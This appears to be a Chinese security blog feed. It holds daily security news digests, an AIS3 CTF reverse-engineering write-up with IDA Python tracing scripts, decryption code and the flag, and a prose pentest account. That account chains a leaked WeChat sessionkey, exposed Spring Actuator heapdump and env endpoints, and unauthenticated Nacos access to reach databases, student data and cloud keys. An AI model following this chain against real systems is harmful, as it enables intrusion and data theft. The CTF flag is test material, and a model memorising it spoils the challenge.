网络安全日报 2024年02月29日
1、研究人员发现AMOS窃取程序新变种 https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/ 研究人员重新审视恶意软件旧样本(或挖掘新样本),隔离多个可疑且未被检测到的 macOS 磁盘映像文件,经过分析发现 AMOS(原子)窃取程序的新变种。新变种删除并使用 Python 脚本来保持隐蔽。研究人员正在分享检测指标和规则,以帮助识别并阻止这种威胁。该恶意软件会获取浏览器中存储的信息和系统上的特殊文件,还会采用策略窃取本地用户帐户密码。 2、黑客劫持Ubiquiti路由器发起隐秘攻击 https://www.bleepingcomputer.com/news/security/russian-hackers-hijack-ubiquiti-routers-to-launch-stealthy-attacks/ FBI在联合咨询中表示,俄罗斯军事黑客正在使用受损的 Ubiquiti EdgeRouter 来逃避检测。该网络间谍追溯为俄罗斯总参谋部主要情报局 (GRU) 的一部分,被追踪为 APT28 和 Fancy Bear,正在使用这些被劫持且流行的路由器来构建广泛的僵尸网络,帮助窃取凭据、收集 NTLMv2 摘要和代理恶意流量。此外还在针对全球军队、政府和其他组织的秘密 3、多个勒索软件组织利用ScreenConnect漏洞攻击 https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html Black Basta 和 Bl00dy 勒索软件团伙加入了针对未针对最高严重性身份验证绕过漏洞修补的 ScreenConnect 服务器的广泛攻击。此严重缺陷 (CVE-2024-1709) 允许攻击者在暴露于 Internet 的服务器上创建管理员帐户、删除所有其他用户并接管任何易受攻击的实例。这些漏洞被利用来部署勒索软件,从而对依赖该软件的企业造成相当大的 4、Hugging Face漏洞使人工智能模型面临供应链风险 https://hiddenlayer.com/research/silent-sabotage/ Hugging Face 是一个流行的协作平台,可帮助用户托管预先训练的机器学习模型和数据集,以及构建、部署和训练它们。研究人员发现,Hugging Face Safetensors 转换服务有可能遭到破坏,最终劫持用户提交的模型并导致供应链攻击。报告中表示:“可以将含有攻击者控制数据的恶意拉取请求从 Hugging Face 服务发送到平台上的任何存储库,并劫持通过转换服务提交的任何模型。”反过来,这可以使用旨在由服务转换的劫持模型来完成,从而允许恶意行为者通过伪装成转换机器人来请求对平台上 5、制药巨头Cencora在网络攻击中发生数据泄露 https://www.sec.gov/Archives/edgar/data/1140859/000110465924028288/tm247267d1_8k.htm 制药巨头 Cencora 表示他们遭受了网络攻击,威胁者从企业 IT 系统中窃取了数据。Cencora 以前称为 AmerisourceBergen,专门从事制药服务,为医生办公室、药房和动物保健提供药物分销和解决方案。 该公司 2023 财年的收入为 2,622 亿美元,拥有约 46,000 名员工。Cencora 表示,他们尚未确定该事件是否会对他们的财务或运营产生重大影响。目前,还没有关于谁入侵了 Cencora 的进 6、英特尔酷睿 Ultra vPro 平台带来新的安全功能 https://www.securityweek.com/intel-core-ultra-vpro-platform-brings-new-security-features/ 英特尔周二宣布通过最新的 vPro 平台和该公司的优质 Core Ultra 处理器推出新的和改进的安全功能。 7、WP LiteSpeed插件漏洞使 500 万个网站面临风险 https://thehackernews.com/2024/02/wordpress-litespeed-plugin.html WordPress 的 LiteSpeed Cache 插件中披露了一个安全漏洞,该漏洞可能使未经身份验证的用户能够升级其权限。该漏洞编号为CVE-2023-40000,已于 2023 年 10 月在版本 5.7.0.1 中得到解决。 8、许多主要新闻媒体正屏蔽 OpenAI 爬虫 https://www.freebuf.com/news/392764.html 自OpenAI的内容生成式人工智能模型面世以来,大量互联网数据成为了不断训练和优化模型的“饵料”,但据路透社研究所的一项调查,有越来越多的新闻媒体已对OpenAI的数据爬取说“不”,在传统媒体领域,这一比例甚至超过了50%。 9、黑客借助LabHost平台对加拿大银行用户发起大规模钓鱼攻击 https://www.freebuf.com/news/392751.html 网络钓鱼即服务(PhaaS)平台 "LabHost "一直在帮助网络犯罪分子攻击北美银行,尤其是加拿大的金融机构,近日的攻击活动明显增加。 10、工信部印发《工业领域数据安全能力提升实施方案(2024-2026年)》 https://wap.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2024/art_1a556c20db1b4e19a12578044db0558e.html 工业和信息化部近日印发《工业领域数据安全能力提升实施方案(2024—2026年)》,提出到2026年底,我国工业领域数据安全保障体系基本建立。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
【总结】对大量函数进行trace调用流程+国际AIS3题
现在混淆的主要目的之一就有让逆向分析人员不清楚函数的调用流程,给你一堆函数,加了高强度的OLLVM,更不能看了。那么Trace跟踪技术就显得很重要的,如果清楚了函数调用流程,那么逐个分析,距离成功不就很快了。 万事开头难,逆向程序难在不知道从哪开始。 前几天做了一道AIS3的题目,内含50个加密函数,加密的流程很简单,关键是对这50个加密函数进行了ollvm控制流平坦化魔改(去除也很简单),主要是想抛砖引玉,锻炼和练习trace的技术。这样在以后遇到高强度的混淆干扰也能有一战的能力。 题目附件如下: [stateful] 本文的重点在于总结trace技巧,题目本身不算很难。 分析 打开题目,进入main函数 发现逻辑不是很难,进入state_machine函数 好家伙,一大坨 尝试使用OBPO插件去除,发现直接卡死。使用D810也是卡死。 更高级的玩法使用Unicorn进行去除,类似deflat 本文的重点是在不去除平坦化的前提下去trace函数调用流程 发现有50多个state函数,并且每个函数的功能很简单,我们的目的是: trace每一个函数,并在梳理调用流程的过程中,输出关键的加密流程,从而写出解密流程 注意调试的时候,记得传入参数 Trace 方法一:手动trace 最简单粗暴的方法,对每一个state函数下断点,然后运行程序,逐一拿到调用流程。 如果函数过多,这种方法就不太行了 最终笔者运行拿到了调用的流程 a1[14] += a1[35] + a1[8];  a1[9] -= a1[2] + a1[22];  *a1 -= a1[18] + a1[31];  a1[2] += a1[11] + a1[8];  a1[6] += a1[10] + a1[41];  a1[14] -= a1[32] + a1[6];  a1[16] += a1[25] + a1[11];  a1[31] += a1[34] + a1[16];  a1[9] += a1[11] + a1[3];  a1[17] += *a1 + a1[7];  a1[5] += a1[40] + a1[4];  a1[37] -= a1[29] + a1[3];  a1[23] += a1[7] + a1[34];  a1[39] -= a1[25] + a1[38];  a1[27] += a1[18] + a1[20];  a1[20] += a1[19] + a1[24];  a1[15] += a1[22] + a1[10];  a1[30] -= a1[33] + a1[8];  a1[1] -= a1[29] + a1[13];  a1[19] += a1[10] + a1[16];  *a1 += a1[33] + a1[16];  a1[36] += a1[11] + a1[15];  a1[24] += a1[20] + a1[5];  a1[7] += a1[21] + *a1;  a1[1] += a1[15] + a1[6];  a1[30] -= a1[13] + a1[2];  a1[1] += a1[16] + a1[40];  a1[31] += a1[1] + a1[16];  a1[32] += a1[5] + a1[25];  a1[13] += a1[25] + a1[28];  a1[7] += a1[10] + *a1;  a1[21] += a1[34] + a1[15];  a1[21] -= a1[13] + a1[42];  a1[18] += a1[29] + a1[15];  a1[4] += a1[7] + a1[25];  *a1 += a1[28] + a1[31];  a1[2] += a1[34] + a1[25];  a1[13] += a1[26] + a1[8];  a1[41] -= a1[3] + a1[34];  a1[37] += a1[27] + a1[18];  a1[4] += a1[27] + a1[25];  a1[23] += a1[30] + a1[39];  a1[18] += a1[26] + a1[31];  a1[10] -= a1[12] + a1[22];  a1[4] += a1[6] + a1[22];  a1[37] += a1[12] + a1[16];  a1[15] += a1[40] + a1[8];  a1[17] += a1[38] + a1[24];  a1[8] += a1[14] + a1[16];  a1[5] += a1[37] + a1[20]; 其实手都快残了 方法二:IDA-trace 程序动态调试的时候才可以使用trace功能 IDA自动进行trace跟踪,然后稍等片刻 可以发现成功的trace了调用了流程 但是有一点不方便的是,有了调用流程,但是我们还要进入每一个函数,提取加密的流程才行。 IDA快捷键Ctrl+F5可以导出整个程序的伪代码 然后进一步提取和分析 这里可以使用IDA-python自动下断点  Go  import idc    bpt_addr = 0x5599F331ADA7  bpt_size=1  idaapi.add_bpt(bpt_addr,bpt_size)  print("Final") 当然还不够,我们要达到的效果是,触发断点然后输出相关加密信息到output函数窗口,就是有断点回调函数  import idaapi    # 定义回调函数  def my_bpt_callback(bptno):  print("Breakpoint %d hit!" % bptno)    # 添加断点  bpt_addr = 0x5599F331ADA7  bpt_size=1  bpt = idaapi.add_bpt(bpt_addr,bpt_size)    # 设置断点回调  idaapi.add_bpt_chngev_cnd(bpt, idaapi.BPT_EXEC, my_bpt_callback)  #设置执行断点 ----------------------------------------------------------------------- idaapi.BPT_EXEC 表示执行事件 方法三:trace_natives https://github.com/Pr0214/trace_natives按照说明,进行输出,发现是这样的效果(IDA中,Edit-Plugins-traceNatives) 解密 有了调用流程,剩下的就很简单了 #define _CRT_SECURE_NO_WARNINGS  #include <stdio.h>  #include <iostream>    int main() {  unsigned char a1[] = {  0x0F, 0x77, 0xEC, 0x33, 0x44, 0x16, 0x13, 0x59, 0x1D, 0x42,  0x84, 0x75, 0x5F, 0xE4, 0x83, 0xC0, 0x3B, 0xC1, 0x95, 0xCF,  0xDB, 0x33, 0x6C, 0xD2, 0xED, 0x72, 0x5F, 0x0D, 0x74, 0x41,  0x5B, 0x73, 0xA0, 0x33, 0x53, 0x24, 0x02, 0x59, 0x74, 0x60,  0x33, 0xCC, 0x7D };      a1[5] -= a1[37] + a1[20];  a1[8] -= a1[14] + a1[16];  a1[17] -= a1[38] + a1[24];  a1[15] -= a1[40] + a1[8];  a1[37] -= a1[12] + a1[16];  a1[4] -= a1[6] + a1[22];  a1[10] += a1[12] + a1[22];  a1[18] -= a1[26] + a1[31];  a1[23] -= a1[30] + a1[39];  a1[4] -= a1[27] + a1[25];  a1[37] -= a1[27] + a1[18];  a1[41] += a1[3] + a1[34];  a1[13] -= a1[26] + a1[8];  a1[2] -= a1[34] + a1[25];  *a1 -= a1[28] + a1[31];  a1[4] -= a1[7] + a1[25];  a1[18] -= a1[29] + a1[15];  a1[21] += a1[13] + a1[42];  a1[21] -= a1[34] + a1[15];  a1[7] -= a1[10] + *a1;  a1[13] -= a1[25] + a1[28];  a1[32] -= a1[5] + a1[25];  a1[31] -= a1[1] + a1[16];  a1[1] -= a1[16] + a1[40];  a1[30] += a1[13] + a1[2];  a1[1] -= a1[15] + a1[6];  a1[7] -= a1[21] + *a1;  a1[24] -= a1[20] + a1[5];  a1[36] -= a1[11] + a1[15];  *a1 -= a1[33] + a1[16];  a1[19] -= a1[10] + a1[16];  a1[1] += a1[29] + a1[13];  a1[30] -= a1[33] + a1[8];  a1[15] -= a1[22] + a1[10];  a1[20] -= a1[19] + a1[24];  a1[27] -= a1[18] + a1[20];  a1[39] += a1[25] + a1[38];  a1[23] -= a1[7] + a1[34];  a1[37] += a1[29] + a1[3];  a1[5] -= a1[40] + a1[4];  a1[17] -= *a1 + a1[7];  a1[9] -= a1[11] + a1[3];  a1[31] -= a1[34] + a1[16];  a1[16] -= a1[25] + a1[11];  a1[14] += a1[32] + a1[6];  a1[6] -= a1[10] + a1[41];  a1[2] -= a1[11] + a1[8];  *a1 += a1[18] + a1[31];  a1[9] += a1[2] + a1[22];  a1[14] -= a1[35] + a1[8];    printf("%s", a1);  return 0; } 得到flag AIS3{4re_YOu@sTATEfUl_0r_StA03L3S$_ctF3R}
网络安全日报 2024年02月28日
1、8000多个品牌域名被劫持用于传播大规模垃圾邮件 https://labs.guard.io/subdomailing-thousands-of-hijacked-major-brand-subdomains-found-bombarding-users-with-millions-a5e5fb892935 研究人员发现了一场规模庞大的子域名劫持活动,已损害了来自知名品牌和机构的8,000多个域名,包括MSN、VMware、McAfee、《经济学人》、康奈尔大学、CBS、Marvel、eBay等。这种被称为“SubdoMailing”的恶意活动利用与这些域相关的信任,每天传播数以百万计的垃圾邮件和恶意网络钓鱼电子邮件,利用其可信度和被盗资源 2、钢铁巨头蒂森克虏伯证实汽车部门遭受网络攻击 https://www.bleepingcomputer.com/news/security/steel-giant-thyssenkrupp-confirms-cyberattack-on-automotive-division/ 蒂森克虏伯股份公司是全球最大的钢铁生产商之一,是全球产品供应链的重要组成部分,这些产品使用钢铁作为材料,应用于机械、汽车、电梯和自动扶梯、工业工程、可再生能源和建筑等各个领域拥有超过 10 万名员工,年收入超过 444 亿美元(2022 年)。钢铁巨头蒂森克虏伯证实,黑客入侵了其汽车部门的系统,当前采取了各种安全措施,暂时下线了某些应用程序和系统。没有其他业务部 3、新IDAT加载程序使用隐写术推送商业木马 https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga 总部位于芬兰的乌克兰实体已成为恶意活动的一部分,该活动使用名为 IDAT Loader 的恶意软件加载程序分发名为 Remcos RAT 的商业远程访问木马。此次攻击研究人员追踪到,名为 UAC-0184 的威胁行为者所为。研究人员探讨了攻击的更广泛的执行过程,强调了关键的独特方面,包括 IDAT 加载程序的使用以及针对芬兰乌克兰实体的攻击。CERT-UA(在乌克兰编写)和Uptycs之前已审查了相关 Remcos RAT 攻击的详细 4、黑客利用已停更的CMS编辑器攻击政府和教育网站 https://www.bleepingcomputer.com/news/security/hackers-exploit-14-year-old-cms-editor-on-govt-edu-sites-for-seo-poisoning/ 威胁行为者正在利用 14 年前停止使用的 CMS 编辑器来危害世界各地的教育和政府实体,通过恶意网站或诈骗来篡改搜索结果。开放重定向是指网站允许任意重定向请求,在没有充分验证或安全检查的情况下将用户从原始站点带到外部 URL。攻击者滥用这些开放重定向来执行网络钓鱼攻击、传播恶意软件或欺骗用户,同时看似来自合法域。由于 URL 托管在受信任的域上,因此 5、美国及其盟友警告APT29组织转向云攻击 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a 五眼 (FVEY) 情报联盟成员警告称,APT29 俄罗斯对外情报局 (SVR) 黑客现在正转向针对受害者的云服务进行攻击。APT29 (也被称为 Cozy Bear、Midnight Blizzard、The Dukes)在三年多前精心策划的SolarWinds 供应链攻击之后,入侵了多个美国联邦机构。APT29 最初的云漏洞向量还包括使用被盗的访问令牌(使他们能够在不使用凭据的情况下劫持帐户)、受感染的住宅路由器来代理其恶意活动、绕过多因素身份验证 (M 6、NIST网络安全框架2.0正式发布 https://www.securityweek.com/nist-cybersecurity-framework-2-0-officially-released/ NIST 发布了网络安全框架 2.0,这是自十年前 CSF 创建以来的首次重大更新。该网络安全框架最初针对关键基础设施组织,但已得到广泛使用和广泛推荐,NIST 强调CSF 2.0旨在帮助所有组织降低风险,无论行业、规模或安全复杂程度如何。 7、LiteSpeed Cache插件中XSS漏洞影响数百万wp网站 https://securityaffairs.com/159667/hacking/litespeed-cache-plugin-xss.html 研究人员警告 WordPress Patchstack 的 LiteSpeed Cache 插件中存在一个 XSS 漏洞,追踪为 CVE-2023-40000 研究人员警告称存在未经身份验证的站点范围内存储的 XSS 漏洞。 8、Optum Solutions 遭Blackcat勒索软件攻击影响美国药房 https://securityaffairs.com/159641/cyber-crime/blackcat-ransomware-attack-optum-solutions.html 联合健康集团子公司 Optum 遭受 BlackCat 勒索软件攻击,导致 Change Healthcare 支付交易平台发生中断。 9、开源 Xeno RAT 木马成为 GitHub 上的潜在威胁 https://thehackernews.com/2024/02/open-source-xeno-rat-trojan-emerges-as.html 一种名为Xeno RAT的“精心设计”的远程访问木马 (RAT)已在 GitHub 上发布,其他参与者无需额外付费即可使用该木马。该开源 RAT 采用 C# 编写,与 Windows 10 和 Windows 11 操作系统兼容,配备了“用于远程系统管理的全面功能”,其开发人员(其名称为 moom825)表示。 10、《中华人民共和国保守国家秘密法》修订发布5月1日正式实行 https://www.freebuf.com/news/392731.html 2024 年 2 月 27 日,中华人民共和国第十四届全国人民代表大会常务委员会第八次会议修订通过《中华人民共和国保守国家秘密法》,自 2024 年 5 月 1 日起施行。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年02月27日
1、研究人员利用漏洞解密HomuWitch勒索软件 https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/ HomuWitch 是一种勒索软件最初出现于 2023 年 7 月。与当前大多数勒索软件病毒不同,HomuWitch 的目标目标是最终用户(个人),而不是机构和公司。它的流行率并不是特别高,所要求的赎金金额也不是很大,这使得该恶意软件迄今为止一直处于相对低调的状态。在调查威胁过程中,研究人员发现了一个漏洞,该漏洞能够为所有 HomuWitch 受害者创建免费解密工具。现在公开共享此工具,以帮助受影响的个人免费解密文件。 2、LockBit勒索组织发布声明并重建泄露网站 https://www.govinfosecurity.com/ransomware-operation-lockbit-reestablishes-dark-web-leak-site-a-24442 LockBit 团伙正在新的基础设施上重新启动勒索软件操作,并威胁将更多的攻击集中在政府部门。俄语勒索软件组织 LockBit 周六下午重新建立了一个暗网泄露网站,并发布了一篇显然是由其领导人撰写的长文,声称不会退出地下犯罪世界。LockBit 领导人在一封长信中表示,FBI 似乎利用了 Web 脚本语言 PHP 中的一个漏洞(编号为CVE-2023-3824)来渗透勒索软件即服务操作的服务 3、洛杉矶国际机场250万私人飞机所有者数据泄露 https://www.hackread.com/hackers-leak-private-plane-owners-data-la-airport-breach/ 黑客IntelBroker 声称已经入侵了洛杉矶国际机场的数据库,窃取了属于私人飞机所有者的大量机密用户数据。其中包括敏感信息,IntelBroker 声称利用洛杉矶国际机场使用的 CRM 系统之一中的漏洞成功实施了数据泄露。需要强调的是,泄露的详细信息将黑客行为归咎于名为“kwillsy”的用户。然而,IntelBroker 在声明中澄清,“kwillsy”与此次泄露无关,他们对此次黑客攻击承担全部责任。 4、报告称绕过安全邮件网关的恶意邮件增加了105% https://www.freebuf.com/articles/paper/392602.html 近日,电子邮件安全公司Cofense发布的《2024年度邮件安全报告》指出,在2023年,绕过安全电子邮件网关(SEG)的恶意电子邮件威胁增加了100%以上。换句话说,电子邮件安全解决方案并未有效地阻止威胁。 5、著名杀软厂商Avast被指控向广告商出售用户浏览数据 https://www.securityweek.com/ftc-accuses-avast-of-selling-customer-browsing-data-to-advertisers/ 著名安全厂商 Avast 被美国联邦贸易委员会 (FTC) 指控通过其浏览器扩展和防病毒软件收集消费者网络浏览数据,并在没有充分通知和未经消费者同意的情况下出售这些数据。 6、Zyxel 修补防火墙产品中的远程代码执行漏洞 https://www.securityweek.com/zyxel-patches-remote-code-execution-bug-in-firewall-products/ 台湾地区网络供应商 Zyxel 确认防火墙和接入点中的安全缺陷使用户面临远程代码执行攻击的风险。 7、朝鲜黑客利用恶意 npm 软件包瞄准开发人员 https://thehackernews.com/2024/02/north-korean-hackers-targeting.html 这些恶意软件包包含能够从网络浏览器窃取凭据、下载其他有害脚本以及与已知的朝鲜威胁行为者建立连接的脚本。 8、OWASP发布AI大模型应用网络安全治理检查清单v1.0 https://www.secrss.com/articles/63924 日前,全球开源安全组织OWASP(Open Web Application Security Project)发布了《AI大模型应用网络安全治理检查清单(V1.0)》(以下简称为《检查清单》)。在这份长达32页的《检查清单》中,较完整地介绍了AI大模型部署应用时的安全原则、部署策略和检查对照表,适用于那些希望在快速发展的AI领域中保持领先地位的组织和机构,使他们能够在制定大型语言模型战略时,专注于制定一份全面的关键领域和任务清单。 9、Joomla发现 5 个漏洞可执行任意代码 https://www.anquanke.com/post/id/293403 Joomla 内容管理系统中发现了五个漏洞,可用于在易受攻击的网站上执行任意代码。开发人员已经通过 在版本 5.0.3 和 4.4.3 中 发布 CMS修复程序来修复这些影响 Joomla 多个版本的安全问题。 10、美国卫生与公众服务部 (HHS) 达成第二次勒索软件和解 https://www.cybersecuritydive.com/news/hhs-ransomware-settlement/708236/ 在勒索软件攻击泄露了 14,000 多人的健康信息后,美国卫生与公众服务部 (HHS) 与 Green Ridge Behavioral Health 达成和解。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
Spring Boot 信息泄露总结
1.目标 2.微信sessionkey泄露导致任意用户登录 点击快捷登录,发现可以使用手机号进行登录 发现sessionkey,使用工具利用 没有账号,尝试13111111111(一般测试账号是这个),成功登录 3.进行指纹识别,发现为SpringBoot框架,测试发现SpringActuator信息泄露 4.发现actuator/gateway/routes(Spring路由)可以访问,尝试Spring CloudGeteway Rce Nday利用 利用失败 5.访问配置环境(actuator/env),发现加密的redis密码 由于heapdump端点提供来自应用程序 JVM的堆转储。因此下载到本地分析(可以通过分析查看/env端点被*号替换到数据的具体值。) 分析得到redis密码,redis-cli连接成功 6.访问配置环境(actuator/env),还发现Nacos开放在另外一个ip下 发现这个熟悉的界面 后加nacos成功访问 使用Nacos未授权添加账号密码,成功进入 7.分析代码的详情,发现数据库账号密码,redis账号密码 数据库连接成功 0.4G的学生数据 发现微信key,企业微信key,还有微信支付的key 发现阿里云ak-sk 还有minioadmin的存储桶 存储桶登录成功 总结,Spring框架页内使用广泛,但是记得禁止这个目录的访问(/actuator/),否则一旦泄露,可能导致一系列严重的漏洞。
网络安全日报 2024年02月26日
1、俄罗斯政府软件被植入后门并部署Konni RAT https://medium.com/@DCSO_CyTec/to-russia-with-love-assessing-a-konni-backdoored-suspected-russian-consular-software-installer-ce618ea4b8f3 研究人员发现俄罗斯外交部领事司 (MID) 可能使用的工具安装程序已被植入后门,可传播名为Konni RAT(又名UpDog)的远程访问木马。研究人员将此次活动与源自朝鲜民主主义人民共和国 (DPRK) 的针对俄罗斯的关联行为者联系起来。Konni(又名 Opal Sleet、Osmium 或TA406)活动集群有针对 2、Lucifer僵尸网络新变种针对Apache进行攻击 https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/ 威胁行为者正在针对运行 Apache Hadoop 和 Apache Druid 大数据技术以及新版本 Lucifer 僵尸网络的组织,Lucifer 僵尸网络是一种已知的恶意软件工具,结合了加密劫持和分布式拒绝服务 (DDoS) 功能。该活动采用了著名的 DDoS 僵尸网络的新变体,该变体专注于易受攻击的 Linux 系统,将其转变为门罗币加密挖矿机器人,称为 Lucifer 恶意软件,研究人员深入研究攻击 3、LockBit勒索软件秘密构建下一代加密器 https://www.trendmicro.com/en_us/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version.html 研究人员发现LockBit 勒索软件开发人员正在秘密构建新版本的文件加密恶意软件,称为 LockBit-NG-Dev,很可能成为 LockBit 4.0,虽然以前的 LockBit 恶意软件是用 C/C++ 构建的,但最新的示例是用 .NET 编写的正在进行的工作,似乎是使用 CoreRT 编译的,并使用 MPRESS 打包。该版本似乎处于最后的开发阶段,已经提供了大部分预期功能功能。研究 4、Linux修复多个内核中的竞争条件漏洞 https://tuxcare.com/blog/multiple-race-condition-vulnerabilities-fixed-in-the-linux-kernel/ Linux中发现了多个漏洞,揭示了 KSMBD 实现中的竞争条件。该缺陷可能被远程攻击者利用导致拒绝服务或执行任意代码,从而对系统稳定性和安全性构成重大威胁。分配的 CVE 编号为CVE-2023-32250、CVE-2023-32252和CVE-2023-32257。竞争条件漏洞通常发生在并发或多线程程序中,其中多个进程或线程在没有适当同步的情况下访问共享资源。这可能会导致不可预测的结果,例如数据损坏、系统崩 5、AT&T大规模中断影响美国移动用户 https://www.bleepingcomputer.com/news/mobile/massive-atandt-outage-impacts-us-mobile-subscribers/ 近日,来自 Verizon、T-Mobile 和 AT&T 的数万名美国客户抱怨缺乏无线服务或服务中断。拨出和拨入的电话似乎都受到了影响,包括该国某些地区的 911 紧急服务电话。网络服务提供商指出,从 UTC 时间 08:48 开始,AT&T 记录了流量(移动 IPv6 和 IPv4)的重大数据丢失,影响了美国多个城市(例如达拉斯、芝加哥、洛杉矶)的 AT&T 用户。中断原因尚不清楚。媒体已联系移 6、研究人员分析Apple Shortcuts零点击快捷方式漏洞 https://www.bitdefender.com/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/ 研究人员在 Apple Shortcuts 中发现了一个漏洞,潜在的攻击者可以通过该漏洞在不提示用户的情况下通过某些操作访问敏感数据。该漏洞的编号为CVE-2024-23204(CVSS 评分:7.5),分别影响运行 macOS Sonoma 14.3 之前版本的 Mac OS 和 iOS 设备以及运行 iOS 17.3 和 iPadOS 17.3 之前版本的 Mac 7、黑客利用Google Cloud Run传播多款银行木马 https://blog.talosintelligence.com/google-cloud-run-abuse/ Google Cloud Run是 Google 提供的一项服务,使客户能够构建和部署位于 Google Cloud 中的 Web 服务。研究人员发现自 2023 年 9 月以来,利用 Google Cloud Run 服务向潜在受害者感染银行木马的恶意电子邮件数量显着增加。最近观察到的一些最大数量的活动被用来向主要位于拉丁美洲国家的受害者传送Astaroth、Mekotio和Ousaban银行木马。目前的 Astaroth 变体针对 15 个拉丁美洲国家的 300 多家机构 8、研究人员发现针对石油和天然气行业新的恶意活动 https://cofense.com/blog/new-maas-infostealer-malware-campaign-targeting-oil-gas-sector/ 研究人员正在跟踪一项高级活动,该活动已成功实现攻击石油和天然气行业的预期目标。该活动提供了一种不常见但先进的恶意软件即服务信息窃取程序,即Rhadamanthys Stealer。在执法部门取缔 LockBit 勒索软件组织(最活跃的勒索软件即服务 (RaaS) 之一)后的几天内,这种新的高级网络钓鱼活动采用了最近更新的恶意软件即服务 (MaaS)。该恶意软件家族最近在黑市上出现重大更新,这可能是在如此高级的活动中看 9、Akira勒索软件集团声称攻击Quik金融服务公司 https://thecyberexpress.com/quik-pawn-shop-cyberattack Quik Pawn Shops 成立于 1978 年,该公司提供一系列金融服务,包括典当贷款、产权贷款、现金垫款、分期贷款和支票兑现,一直是许多需要快速金融解决方案的人值得信赖的资源。Akira 勒索软件组织声称对暗网上的 Quik Pawn Shop 网络攻击负责,Quik Pawn Shop 于 2024 年 2 月 22 日发生网络攻击,导致 Quik Pawn Shop 陷入数据泄露的后果之中。此次攻击背后的网络犯罪分子声称从 Quik Pawn Shop 的系统中获取了 1 10、微软发布用于识别AI风险的红队工具PyRIT https://github.com/Azure/PyRIT 微软发布了一个名为PyRIT(Python 风险识别工具的缩写)的开放访问自动化框架,用于主动识别生成人工智能 (AI) 系统中的风险。PyRIT 可用于评估大语言模型 (LLM) 端点针对不同伤害类别的稳健性,例如捏造(例如幻觉)、滥用(例如偏见)和禁止内容(例如骚扰)。它还可用于识别从恶意软件生成到越狱的安全危害,以及身份盗窃等隐私危害。此外,该工具允许研究人员迭代和改进针对不同危害的缓解措施。例如,在 Microsoft,正在使用此工具来迭代产品的不同版本(及其元提示),以便更有效地防范提示注入攻击。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年02月23日
1、SSH-Snake恶意软件窃取SSH密钥并在网络中传播 https://sysdig.com/blog/ssh-snake/ 研究团队发现了对 2024 年 1 月 4 日发布的名为SSH-Snake的新网络映射工具的恶意使用。SSH -Snake 是一种自我修改蠕虫,它利用在受感染系统上发现的 SSH 凭据来启动在整个网络中传播。该蠕虫会自动搜索已知的凭据位置和 shell 历史文件以确定其下一步行动。当前SSH-Snake 被威胁行为者积极用于攻击行动。 SSH-Snake 活动可以通过运行时威胁检测工具来识别,例如 Sysdig Secure 或Open Source Falco。研究人员提取几条可用于检测此威胁的Falco规则。 2、VietCredCare窃取者瞄准越南Facebook广告商 https://www.group-ib.com/blog/vietcredcare-stealer/ 至少从 2022 年 8 月起,越南的 Facebook 广告商就成为了一个名为VietCredCare 的未知信息窃取者的目标。研究人员表示,该恶意软件“因其能够自动过滤掉从受感染设备窃取的 Facebook 会话 cookie 和凭据,并评估这些帐户是否管理业务资料以及是否保持正元广告信用余额而闻名”。当前大量著名的越南公共和私营部门组织面临受到损害的风险。VietCredCare 泄露了9 个越南政府机构、12 个省市的国家公共服务门户、65所大学、4 个电子商务平台、21 家银行、 3、研究人员披露利用垃圾邮件的攻击活动Texonto https://www.welivesecurity.com/en/eset-research/operation-texonto-information-operation-targeting-ukrainian-speakers-context-war/ 网络安全研究人员发现了一系列针对乌克兰的新影响行动,该行动利用垃圾邮件传播与战争相关的虚假信息。Texonto 行动(整个活动的代号)并未归因于特定的威胁行为者,尽管其中的某些要素(尤其是鱼叉式网络钓鱼攻击)与COLDRIVER重叠,后者有通过虚假登录获取凭据的历史页。虚假信息操作在 2023 年 11 月和 12 月发生了两波,电子邮 4、VMware提示用户立即卸载增强型身份验证插件EAP https://www.vmware.com/security/advisories/VMSA-2024-0003.html 在发现严重安全漏洞后,VMware 敦促用户卸载已弃用的增强型身份验证插件 (EAP)。该漏洞编号为CVE-2024-22245(CVSS 评分:9.6),被描述为任意身份验证中继错误。EAP是一个软件包,旨在允许通过 Web 浏览器直接登录 vSphere 的管理界面和工具,自 2021 年 3 月起已弃用。默认情况下不包含它,也不属于 vCenter Server、ESXi 或 Cloud Foundation。该公司表示,这些漏洞不会得到解决,而是建议用户完全删 5、英国多所大学遭受针对性DDoS攻击 https://www.infosecurity-magazine.com/news/universities-recovering-ddos-attack/ 英国多所大学的服务受到 DDoS 攻击的影响,剑桥大学临床学校计算服务中心2 月 19 日在其 X(前身为 Twitter)帐户上发帖披露了这一事件,并表示互联网访问将出现间歇性。据称,攻击于 2 月 19 日格林尼治标准时间 15 点开始,“多所大学”受到影响。匿名苏丹黑客组织声称对此负责,黑客追踪者X账户CyberKnow分享了该团伙的帖子截图,其中他们引用英国政府支持以色列在加沙的军事行动和轰炸也门胡塞运动作为袭击的原因。研究机 6、Knight勒索软件源代码在黑客论坛出售 https://www.bleepingcomputer.com/news/security/knight-ransomware-source-code-for-sale-after-leak-site-shuts-down/ 